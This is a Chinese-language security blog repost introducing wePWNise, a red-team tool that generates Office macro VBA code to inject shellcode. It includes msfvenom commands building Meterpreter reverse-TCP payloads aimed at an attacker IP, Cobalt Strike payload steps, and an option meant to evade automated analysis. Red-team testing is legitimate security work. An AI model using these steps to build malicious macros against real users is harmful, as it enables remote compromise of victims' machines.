wePWNise:一款功能强大的红队Office宏VBA代码生成工具

admin
admin
admin
138985
文章
114
评论
2024年5月12日12:39:01评论15 views字数 2018阅读6分43秒阅读模式

 

关于wePWNise
wePWNise是一款功能强大的Office宏VBA代码生成工具,该工具基于纯Python开发,可以帮助广大研究人员生成用于Office宏或模版的VBA代码,并以此来测试目标Office环境、应用程序控制和防护机制的安全性。
wePWNise:一款功能强大的红队Office宏VBA代码生成工具
wePWNise的设计理念将自动化和集成考虑在内,能够以锁定的环境场景为目标。wePWNise能够枚举目标环境的软件限制策略(SRP)和EMET缓解措施,并支持动态识别要将注入Payload的安全二进制文件。除此之外,wePWNise还集成了现有的开发框架(例如Metasploit、Cobalt Strike),并接受原始格式的任何定制Payload,以供红队研究人员使用。
工具运行流程
wePWNise:一款功能强大的红队Office宏VBA代码生成工具
工具要求
Python termcolor包
安装命令如下:
pip install termcolor
工具下载
由于该工具基于Python 2开发,因此我们首先需要在本地设备上安装并配置好Python 2.7版本环境。
接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
git clone https://github.com/FSecureLABS/wePWNise.git
命令行参数
usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64] [--out <output_file>] [--msgbox] [--msg <window_message>]optional arguments: -h, --help 显示工具帮助信息和退出 -i86 <x86_shellcode> 输入x86原始shellcode -i64 <x64_shellcode> 输入x64原始shellcode --inject64 注入64位Payload,注入x86时设置为False,默认为True --out <output_file> 输出VBA宏的文件路径 --msgbox 显示消息框以防止自动化分析,默认为True --msg <window_message> --msgbox设置为True时,需要显示的自定义提示消息
工具使用样例

Metasploit Payload

首先,生成适用于x86和x64架构的原始格式Payload,并确保Metasploit监听器配置正确:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw
然后将wePWNise指向生成的Payload,并将输出结果存储至msf_wepwn.txt:
$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

Cobalt Strike Payload

按照下列路径点击菜单,并在Cobalt Strike中生成原始Payload,然后重复该操作并勾选x64勾选框以生成64位Payload:
Attacks > Packages > Payload Generator
然后将生成的Payload传递给wePWNise并生成VBA代码:
$ wepwnise.py -i86 /payloads/cs86.raw  -i64 /payloads/cs64.raw  --msgbox False --out /payloads/cs_wepwn.txt
自定义Payload


在某些特定场景下,我们可能只能拿到x86 Payload,而wePWNise需要32位和64位两种架构的Payload,为了禁用64位注入功能,我们可以创建一个虚假的64位文件,然后将--inject64参数设置为False:




$ echo "+" > /payloads/dummy64.raw$ wepwnise.py -i86 /payloads/custom.raw  -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt




类似的,如果你只想要生成64位的Payload,可以创建一个虚假的x86文件,然后通过-i86命令行参数提供给wePWNise。










许可证协议










本项目的开发与发布遵循BSD-3-Clause开源许可证协议。










项目地址










wePWNise:


https://github.com/FSecureLABS/wePWNise




原文始发于微信公众号(FreeBuf):wePWNise:一款功能强大的红队Office宏VBA代码生成工具


 






							

						
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
	
				
				

	
    
		
  • 
			左青龙
		
    • 
		
  • 微信扫一扫
    • 
		
  • 
			weinxin
		
    • 
	

	
    
		
  • 
			右白虎
		
    • 
		
  • 微信扫一扫
    • 
		
  • 
			weinxin
		
    • 
	

	



	
	

		

				

	


	




								

			
		

	
									

					admin				
    
											
  • 本文由  发表于 2024年5月12日12:39:01
    • 
						
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  
wePWNise:一款功能强大的红队Office宏VBA代码生成工具https://cn-sec.com/archives/2725754.html

                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

    • 
			

	



				
				

				
										

				
				

	

			

	




				
				

			



	


				




	
	
			

		

							

											

														

																	
发表评论

																匿名网友
								填写信息